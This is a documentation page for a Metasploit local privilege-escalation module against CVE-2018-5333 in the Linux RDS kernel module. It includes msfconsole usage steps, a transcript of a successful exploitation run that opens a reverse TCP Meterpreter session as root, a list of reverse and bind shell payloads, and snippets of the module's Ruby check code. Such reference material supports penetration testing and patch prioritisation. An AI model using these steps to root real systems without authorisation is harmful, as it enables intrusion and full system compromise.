Reliable Datagram Sockets (RDS) rds_atomic_free_op NULL pointer dereference Privilege Escalation - Metasploit


This page contains detailed information about how to use the exploit/linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc metasploit module. For list of all metasploit modules, visit the Metasploit Module Library.

Module Overview


Name: Reliable Datagram Sockets (RDS) rds_atomic_free_op NULL pointer dereference Privilege Escalation
Module: exploit/linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc
Source code: modules/exploits/linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc.rb
Disclosure date: 2018-11-01
Last modification time: 2020-09-18 11:38:43 +0000
Supported architecture(s): x64
Supported platform(s): Linux
Target service / protocol: -
Target network port(s): -
List of CVEs: CVE-2018-5333, CVE-2019-9213

This module attempts to gain root privileges on Linux systems by abusing a NULL pointer dereference in the rds_atomic_free_op function in the Reliable Datagram Sockets (RDS) kernel module (rds.ko). Successful exploitation requires the RDS kernel module to be loaded. If the RDS module is not blacklisted (default); then it will be loaded automatically. This exploit supports 64-bit Ubuntu Linux systems, including distributions based on Ubuntu, such as Linux Mint and Zorin OS. Target offsets are available for: Ubuntu 16.04 kernels 4.4.0 <= 4.4.0-116-generic; and Ubuntu 16.04 kernels 4.8.0 <= 4.8.0-54-generic. This exploit does not bypass SMAP. Bypasses for SMEP and KASLR are included. Failed exploitation may crash the kernel. This module has been tested successfully on various 4.4 and 4.8 kernels.

Module Ranking and Traits


Module Ranking:

  • good: The exploit has a default target and it is the "common case" for this type of software (English, Windows 7 for a desktop app, 2012 for server, etc). More information about ranking can be found here.

Reliability:

  • repeatable-session: The module is expected to get a shell every time it runs.

Stability:

  • crash-os-down: Module may crash the OS, and the OS remains down.

Basic Usage


Note: To run a local exploit, make sure you are at the msf prompt. Also, to check the session ID, use the sessions command.

msf > use exploit/linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc
msf exploit(rds_atomic_free_op_null_pointer_deref_priv_esc) > show targets
    ... a list of targets ...
msf exploit(rds_atomic_free_op_null_pointer_deref_priv_esc) > set TARGET target-id
msf exploit(rds_atomic_free_op_null_pointer_deref_priv_esc) > show options
    ... show and set options ...
msf exploit(rds_atomic_free_op_null_pointer_deref_priv_esc) > set SESSION session-id
msf exploit(rds_atomic_free_op_null_pointer_deref_priv_esc) > exploit

Required Options


  • SESSION: The session to run this module on.

Knowledge Base


Description


This module attempts to gain root privileges on Linux systems by abusing a NULL pointer dereference in the rds_atomic_free_op function in the Reliable Datagram Sockets (RDS) kernel module (rds.ko).

Successful exploitation requires the RDS kernel module to be loaded. If the RDS module is not blacklisted (default); then it will be loaded automatically.

This exploit supports 64-bit Ubuntu Linux systems, including distributions based on Ubuntu, such as Linux Mint and Zorin OS.

Target offsets are available for:

Ubuntu 16.04 kernels 4.4.0 <= 4.4.0-116-generic; and Ubuntu 16.04 kernels 4.8.0 <= 4.8.0-54-generic.

This exploit does not bypass SMAP. Bypasses for SMEP and KASLR are included. Failed exploitation may crash the kernel.

Vulnerable Application


This module has been tested successfully on various 4.4 and 4.8 kernels.

Verification Steps


  1. Start msfconsole
  2. Get a session
  3. use exploit/linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc
  4. set SESSION <SESSION>
  5. check
  6. run
  7. You should get a new root session

Options


SESSION

Which session to use, which can be viewed with sessions

WritableDir

A writable directory file system path. (default: /tmp)

COMPILE

Options: Auto True False (default: Auto)

Whether the exploit should be live compiled with gcc on the target system, or uploaded as a pre-compiled binary.

Auto will first determine if gcc is installed to compile live on the system, and fall back to uploading a pre-compiled executable.

Scenarios


Ubuntu 16.04 kernel 4.8.0-51-lowlatency #54~16.04.1-Ubuntu

  msf5 > use exploit/linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc 
  msf5 exploit(linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc) > set session 1
  session => 1
  msf5 exploit(linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc) > set verbose true
  verbose => true
  msf5 exploit(linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc) > check

  [+] System architecture x86_64 is supported
  [+] Linux kernel 4.8.0-51-lowlatency #54~16.04.1-Ubuntu is vulnerable
  [+] SMAP is not enabled
  [+] LKRG is not installed
  [+] grsecurity is not in use
  [+] rds.ko kernel module is loaded
  [*] The target appears to be vulnerable.
  msf5 exploit(linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc) > set lhost 172.16.191.165
  lhost => 172.16.191.165
  msf5 exploit(linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc) > run

  [*] Started reverse TCP handler on 172.16.191.165:4444 
  [+] System architecture x86_64 is supported
  [+] Linux kernel 4.8.0-51-lowlatency #54~16.04.1-Ubuntu is vulnerable
  [+] SMAP is not enabled
  [+] LKRG is not installed
  [+] grsecurity is not in use
  [+] rds.ko kernel module is loaded
  [+] gcc is installed
  [*] Live compiling exploit on system...
  [*] Writing '/tmp/.zwl2ezPl' (250 bytes) ...
  [*] Launching exploit (timeout: 30)...
  [*] Transmitting intermediate stager...(126 bytes)
  [*] Sending stage (3021284 bytes) to 172.16.191.206
  [*] Meterpreter session 2 opened (172.16.191.165:4444 -> 172.16.191.206:48130) at 2019-12-21 02:22:40 -0500
  [+] Deleted /tmp/.aCNiWb9vps
  [+] Deleted /tmp/.zwl2ezPl
  [*] Linux RDS rds_atomic_free_op NULL pointer dereference local root (CVE-2018-5333)
  [*] [.] checking kernel version...
  [*] [.] kernel version '4.8.0-51-lowlatency #54~16.04.1-Ubuntu' detected
  [*] [~] done, version looks good
  [*] [.] checking system...
  [*] [~] done, looks good
  [*] [.] mapping null address...
  [*] [~] done, mapped null address
  [*] [.] KASLR bypass enabled, getting kernel base address
  [*] [.] trying /proc/kallsyms...
  [*] [-] kernel base not found in /proc/kallsyms
  [*] [.] trying syslog...
  [*] [.] done, kernel text:   ffffffffa7c00000
  [*] [.] commit_creds:        ffffffffa7ca6ed0
  [*] [.] prepare_kernel_cred: ffffffffa7ca72e0
  [*] [.] mmapping fake stack...
  [*] [~] done, fake stack mmapped
  [*] [.] executing payload 0x4027f7...
  [*] [+] got root

  meterpreter > getuid 
  Server username: uid=0, gid=0, euid=0, egid=0
  meterpreter > sysinfo
  Computer     : 172.16.191.206
  OS           : Ubuntu 16.04 (Linux 4.8.0-51-lowlatency)
  Architecture : x64
  BuildTuple   : x86_64-linux-musl
  Meterpreter  : x64/linux
  meterpreter > 

Go back to menu.

Msfconsole Usage


Here is how the linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc exploit module looks in the msfconsole:

msf6 > use exploit/linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc

[*] Using configured payload linux/x64/meterpreter/reverse_tcp
msf6 exploit(linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc) > show info

       Name: Reliable Datagram Sockets (RDS) rds_atomic_free_op NULL pointer dereference Privilege Escalation
     Module: exploit/linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc
   Platform: Linux
       Arch: x64
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Good
  Disclosed: 2018-11-01

Provided by:
  Mohamed Ghannam
  Jann Horn
  wbowling
  bcoles <[email protected]>
  nstarke

Module stability:
 crash-os-down

Module reliability:
 repeatable-session

Available targets:
  Id  Name
  --  ----
  0   Auto

Check supported:
  Yes

Basic options:
  Name     Current Setting  Required  Description
  ----     ---------------  --------  -----------
  COMPILE  Auto             yes       Compile on target (Accepted: Auto, True, False)
  SESSION                   yes       The session to run this module on.

Payload information:

Description:
  This module attempts to gain root privileges on Linux systems by 
  abusing a NULL pointer dereference in the `rds_atomic_free_op` 
  function in the Reliable Datagram Sockets (RDS) kernel module 
  (rds.ko). Successful exploitation requires the RDS kernel module to 
  be loaded. If the RDS module is not blacklisted (default); then it 
  will be loaded automatically. This exploit supports 64-bit Ubuntu 
  Linux systems, including distributions based on Ubuntu, such as 
  Linux Mint and Zorin OS. Target offsets are available for: Ubuntu 
  16.04 kernels 4.4.0 <= 4.4.0-116-generic; and Ubuntu 16.04 kernels 
  4.8.0 <= 4.8.0-54-generic. This exploit does not bypass SMAP. 
  Bypasses for SMEP and KASLR are included. Failed exploitation may 
  crash the kernel. This module has been tested successfully on 
  various 4.4 and 4.8 kernels.

References:
  https://nvd.nist.gov/vuln/detail/CVE-2018-5333
  https://nvd.nist.gov/vuln/detail/CVE-2019-9213
  http://www.securityfocus.com/bid/102510
  https://gist.github.com/wbowling/9d32492bd96d9e7c3bf52e23a0ac30a4
  https://github.com/0x36/CVE-pocs/blob/master/CVE-2018-5333-rds-nullderef.c
  https://bugs.chromium.org/p/project-zero/issues/detail?id=1792&desc=2
  https://people.canonical.com/~ubuntu-security/cve/2018/CVE-2018-5333.html
  https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=7d11f77f84b27cef452cee332f4e469503084737
  https://git.kernel.org/pub/scm/linux/kernel/git/torvalds/linux.git/commit/?id=15133f6e67d8d646d0744336b4daa3135452cb0d
  https://github.com/bcoles/kernel-exploits/blob/master/CVE-2018-5333/cve-2018-5333.c

Module Options


This is a complete list of options available in the linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc exploit:

msf6 exploit(linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc) > show options

Module options (exploit/linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc):

   Name     Current Setting  Required  Description
   ----     ---------------  --------  -----------
   COMPILE  Auto             yes       Compile on target (Accepted: Auto, True, False)
   SESSION                   yes       The session to run this module on.

Payload options (linux/x64/meterpreter/reverse_tcp):

   Name   Current Setting  Required  Description
   ----   ---------------  --------  -----------
   LHOST                   yes       The listen address (an interface may be specified)
   LPORT  4444             yes       The listen port

Exploit target:

   Id  Name
   --  ----
   0   Auto

Advanced Options


Here is a complete list of advanced options supported by the linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc exploit:

msf6 exploit(linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc) > show advanced

Module advanced options (exploit/linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc):

   Name                    Current Setting  Required  Description
   ----                    ---------------  --------  -----------
   AutoCheck               true             no        Run check before exploit
   ContextInformationFile                   no        The information file that contains context information
   DisablePayloadHandler   false            no        Disable the handler code for the selected payload
   EXE::Custom                              no        Use custom exe instead of automatically generating a payload exe
   EXE::EICAR              false            no        Generate an EICAR file instead of regular payload exe
   EXE::FallBack           false            no        Use the default template in case the specified one is missing
   EXE::Inject             false            no        Set to preserve the original EXE function
   EXE::OldMethod          false            no        Set to use the substitution EXE generation method.
   EXE::Path                                no        The directory in which to look for the executable template
   EXE::Template                            no        The executable template file name.
   EnableContextEncoding   false            no        Use transient context when encoding payloads
   FileDropperDelay                         no        Delay in seconds before attempting cleanup
   ForceExploit            false            no        Override check result
   MSI::Custom                              no        Use custom msi instead of automatically generating a payload msi
   MSI::EICAR              false            no        Generate an EICAR file instead of regular payload msi
   MSI::Path                                no        The directory in which to look for the msi template
   MSI::Template                            no        The msi template file name
   MSI::UAC                false            no        Create an MSI with a UAC prompt (elevation to SYSTEM if accepted)
   VERBOSE                 false            no        Enable detailed status messages
   WORKSPACE                                no        Specify the workspace for this module
   WfsDelay                2                no        Additional delay in seconds to wait for a session
   WritableDir             /tmp             yes       A directory where we can write files

Payload advanced options (linux/x64/meterpreter/reverse_tcp):

   Name                         Current Setting  Required  Description
   ----                         ---------------  --------  -----------
   AppendExit                   false            no        Append a stub that executes the exit(0) system call
   AutoLoadStdapi               true             yes       Automatically load the Stdapi extension
   AutoRunScript                                 no        A script to run automatically on session creation.
   AutoSystemInfo               true             yes       Automatically capture system information on initialization.
   AutoUnhookProcess            false            yes       Automatically load the unhook extension and unhook the process
   AutoVerifySessionTimeout     30               no        Timeout period to wait for session validation to occur, in seconds
   EnableStageEncoding          false            no        Encode the second stage payload
   EnableUnicodeEncoding        false            yes       Automatically encode UTF-8 strings as hexadecimal
   HandlerSSLCert                                no        Path to a SSL certificate in unified PEM format, ignored for HTTP transports
   InitialAutoRunScript                          no        An initial script to run on session creation (before AutoRunScript)
   MeterpreterDebugLevel        0                yes       Set debug level for meterpreter 0-3 (Default output is strerr)
   PayloadProcessCommandLine                     no        The displayed command line that will be used by the payload
   PayloadUUIDName                               no        A human-friendly name to reference this unique payload (requires tracking)
   PayloadUUIDRaw                                no        A hex string representing the raw 8-byte PUID value for the UUID
   PayloadUUIDSeed                               no        A string to use when generating the payload UUID (deterministic)
   PayloadUUIDTracking          false            yes       Whether or not to automatically register generated UUIDs
   PingbackRetries              0                yes       How many additional successful pingbacks
   PingbackSleep                30               yes       Time (in seconds) to sleep between pingbacks
   PrependChrootBreak           false            no        Prepend a stub that will break out of a chroot (includes setreuid to root)
   PrependFork                  false            no        Prepend a stub that starts the payload in its own process via fork
   PrependSetgid                false            no        Prepend a stub that executes the setgid(0) system call
   PrependSetregid              false            no        Prepend a stub that executes the setregid(0, 0) system call
   PrependSetresgid             false            no        Prepend a stub that executes the setresgid(0, 0, 0) system call
   PrependSetresuid             false            no        Prepend a stub that executes the setresuid(0, 0, 0) system call
   PrependSetreuid              false            no        Prepend a stub that executes the setreuid(0, 0) system call
   PrependSetuid                false            no        Prepend a stub that executes the setuid(0) system call
   RemoteMeterpreterDebugFile                    no        Redirect Debug Info to a Log File
   ReverseAllowProxy            false            yes       Allow reverse tcp even with Proxies specified. Connect back will NOT go through proxy but directly to LHOST
   ReverseListenerBindAddress                    no        The specific IP address to bind to on the local system
   ReverseListenerBindPort                       no        The port to bind to on the local system if different from LPORT
   ReverseListenerComm                           no        The specific communication channel to use for this listener
   ReverseListenerThreaded      false            yes       Handle every connection in a new thread (experimental)
   SessionCommunicationTimeout  300              no        The number of seconds of no activity before this session should be killed
   SessionExpirationTimeout     604800           no        The number of seconds before this session should be forcibly shut down
   SessionRetryTotal            3600             no        Number of seconds try reconnecting for on network failure
   SessionRetryWait             10               no        Number of seconds to wait between reconnect attempts
   StageEncoder                                  no        Encoder to use if EnableStageEncoding is set
   StageEncoderSaveRegisters                     no        Additional registers to preserve in the staged payload if EnableStageEncoding is set
   StageEncodingFallback        true             no        Fallback to no encoding if the selected StageEncoder is not compatible
   StagerRetryCount             10               no        The number of times the stager should retry if the first connect fails
   StagerRetryWait              5                no        Number of seconds to wait for the stager between reconnect attempts
   VERBOSE                      false            no        Enable detailed status messages
   WORKSPACE                                     no        Specify the workspace for this module

Exploit Targets


Here is a list of targets (platforms and systems) which the linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc module can exploit:

msf6 exploit(linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc) > show targets

Exploit targets:

   Id  Name
   --  ----
   0   Auto

Compatible Payloads


This is a list of possible payloads which can be delivered and executed on the target system using the linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc exploit:

msf6 exploit(linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc) > show payloads

Compatible Payloads
===================

   #   Name                                          Disclosure Date  Rank    Check  Description
   -   ----                                          ---------------  ----    -----  -----------
   0   payload/generic/custom                                         normal  No     Custom Payload
   1   payload/generic/shell_bind_tcp                                 normal  No     Generic Command Shell, Bind TCP Inline
   2   payload/generic/shell_reverse_tcp                              normal  No     Generic Command Shell, Reverse TCP Inline
   3   payload/linux/x64/exec                                         normal  No     Linux Execute Command
   4   payload/linux/x64/meterpreter/bind_tcp                         normal  No     Linux Mettle x64, Bind TCP Stager
   5   payload/linux/x64/meterpreter/reverse_tcp                      normal  No     Linux Mettle x64, Reverse TCP Stager
   6   payload/linux/x64/meterpreter_reverse_http                     normal  No     Linux Meterpreter, Reverse HTTP Inline
   7   payload/linux/x64/meterpreter_reverse_https                    normal  No     Linux Meterpreter, Reverse HTTPS Inline
   8   payload/linux/x64/meterpreter_reverse_tcp                      normal  No     Linux Meterpreter, Reverse TCP Inline
   9   payload/linux/x64/shell/bind_tcp                               normal  No     Linux Command Shell, Bind TCP Stager
   10  payload/linux/x64/shell/reverse_tcp                            normal  No     Linux Command Shell, Reverse TCP Stager
   11  payload/linux/x64/shell_bind_ipv6_tcp                          normal  No     Linux x64 Command Shell, Bind TCP Inline (IPv6)
   12  payload/linux/x64/shell_bind_tcp                               normal  No     Linux Command Shell, Bind TCP Inline
   13  payload/linux/x64/shell_bind_tcp_random_port                   normal  No     Linux Command Shell, Bind TCP Random Port Inline
   14  payload/linux/x64/shell_reverse_ipv6_tcp                       normal  No     Linux x64 Command Shell, Reverse TCP Inline (IPv6)
   15  payload/linux/x64/shell_reverse_tcp                            normal  No     Linux Command Shell, Reverse TCP Inline

Evasion Options


Here is the full list of possible evasion options supported by the linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc exploit in order to evade defenses (e.g. Antivirus, EDR, Firewall, NIDS etc.):

msf6 exploit(linux/local/rds_atomic_free_op_null_pointer_deref_priv_esc) > show evasion

Module evasion options:

   Name  Current Setting  Required  Description
   ----  ---------------  --------  -----------

Go back to menu.

Error Messages


This module may fail with the following error messages:

Check for the possible causes from the code snippets below found in the module source code. This can often times help in identifying the root cause of the problem.

System architecture <ARCH> is not supported


Here is a relevant code snippet related to the "System architecture <ARCH> is not supported" error message:

85:	  end
86:	
87:	  def check
88:	    arch = kernel_hardware
89:	    unless arch.include? 'x86_64'
90:	      return CheckCode::Safe("System architecture #{arch} is not supported")
91:	    end
92:	    vprint_good "System architecture #{arch} is supported"
93:	
94:	    offsets = strip_comments(exploit_data('CVE-2018-5333', 'cve-2018-5333.c')).scan(/kernels\[\] = \{(.+?)\};/m).flatten.first
95:	    kernels = offsets.scan(/"(.+?)"/).flatten

Linux kernel <VERSION> is not vulnerable


Here is a relevant code snippet related to the "Linux kernel <VERSION> is not vulnerable" error message:

94:	    offsets = strip_comments(exploit_data('CVE-2018-5333', 'cve-2018-5333.c')).scan(/kernels\[\] = \{(.+?)\};/m).flatten.first
95:	    kernels = offsets.scan(/"(.+?)"/).flatten
96:	
97:	    version = "#{kernel_release} #{kernel_version.split(' ').first}"
98:	    unless kernels.include? version
99:	      return CheckCode::Safe("Linux kernel #{version} is not vulnerable")
100:	    end
101:	    vprint_good "Linux kernel #{version} is vulnerable"
102:	
103:	    if smap_enabled?
104:	      return CheckCode::Safe('SMAP is enabled')

SMAP is enabled


Here is a relevant code snippet related to the "SMAP is enabled" error message:

99:	      return CheckCode::Safe("Linux kernel #{version} is not vulnerable")
100:	    end
101:	    vprint_good "Linux kernel #{version} is vulnerable"
102:	
103:	    if smap_enabled?
104:	      return CheckCode::Safe('SMAP is enabled')
105:	    end
106:	    vprint_good 'SMAP is not enabled'
107:	
108:	    if lkrg_installed?
109:	      return CheckCode::Safe('LKRG is installed')

LKRG is installed


Here is a relevant code snippet related to the "LKRG is installed" error message:

104:	      return CheckCode::Safe('SMAP is enabled')
105:	    end
106:	    vprint_good 'SMAP is not enabled'
107:	
108:	    if lkrg_installed?
109:	      return CheckCode::Safe('LKRG is installed')
110:	    end
111:	    vprint_good 'LKRG is not installed'
112:	
113:	    if grsec_installed?
114:	      return CheckCode::Safe('grsecurity is in use')

grsecurity is in use


Here is a relevant code snippet related to the "grsecurity is in use" error message:

109:	      return CheckCode::Safe('LKRG is installed')
110:	    end
111:	    vprint_good 'LKRG is not installed'
112:	
113:	    if grsec_installed?
114:	      return CheckCode::Safe('grsecurity is in use')
115:	    end
116:	    vprint_good 'grsecurity is not in use'
117:	
118:	    unless kernel_modules.include? 'rds'
119:	      vprint_warning 'rds.ko kernel module is not loaded, but may be autoloaded during exploitation'

rds.ko kernel module is not loaded, but may be autoloaded during exploitation


Here is a relevant code snippet related to the "rds.ko kernel module is not loaded, but may be autoloaded during exploitation" error message:

114:	      return CheckCode::Safe('grsecurity is in use')
115:	    end
116:	    vprint_good 'grsecurity is not in use'
117:	
118:	    unless kernel_modules.include? 'rds'
119:	      vprint_warning 'rds.ko kernel module is not loaded, but may be autoloaded during exploitation'
120:	      return CheckCode::Detected('rds.ko kernel module is not loaded, but may be autoloaded during exploitation')
121:	    end
122:	    vprint_good 'rds.ko kernel module is loaded'
123:	
124:	    CheckCode::Appears

rds.ko kernel module is not loaded, but may be autoloaded during exploitation


Here is a relevant code snippet related to the "rds.ko kernel module is not loaded, but may be autoloaded during exploitation" error message:

115:	    end
116:	    vprint_good 'grsecurity is not in use'
117:	
118:	    unless kernel_modules.include? 'rds'
119:	      vprint_warning 'rds.ko kernel module is not loaded, but may be autoloaded during exploitation'
120:	      return CheckCode::Detected('rds.ko kernel module is not loaded, but may be autoloaded during exploitation')
121:	    end
122:	    vprint_good 'rds.ko kernel module is loaded'
123:	
124:	    CheckCode::Appears
125:	  end

Session already has root privileges. Set ForceExploit to override.


Here is a relevant code snippet related to the "Session already has root privileges. Set ForceExploit to override." error message:

125:	  end
126:	
127:	  def exploit
128:	    if is_root?
129:	      unless datastore['ForceExploit']
130:	        fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
131:	      end
132:	    end
133:	
134:	    unless writable? base_dir
135:	      fail_with Failure::BadConfig, "#{base_dir} is not writable"

<BASE_DIR> is not writable


Here is a relevant code snippet related to the "<BASE_DIR> is not writable" error message:

130:	        fail_with Failure::BadConfig, 'Session already has root privileges. Set ForceExploit to override.'
131:	      end
132:	    end
133:	
134:	    unless writable? base_dir
135:	      fail_with Failure::BadConfig, "#{base_dir} is not writable"
136:	    end
137:	
138:	    exploit_path = "#{base_dir}/.#{rand_text_alphanumeric(5..10)}"
139:	
140:	    if live_compile?

Go back to menu.


References


See Also


Check also the following modules related to this module:

Related Nessus plugins:

Authors


  • Mohamed Ghannam
  • Jann Horn
  • wbowling
  • bcoles
  • nstarke

Version


This page has been produced using Metasploit Framework version 6.2.23-dev. For more modules, visit the Metasploit Module Library.

Go back to menu.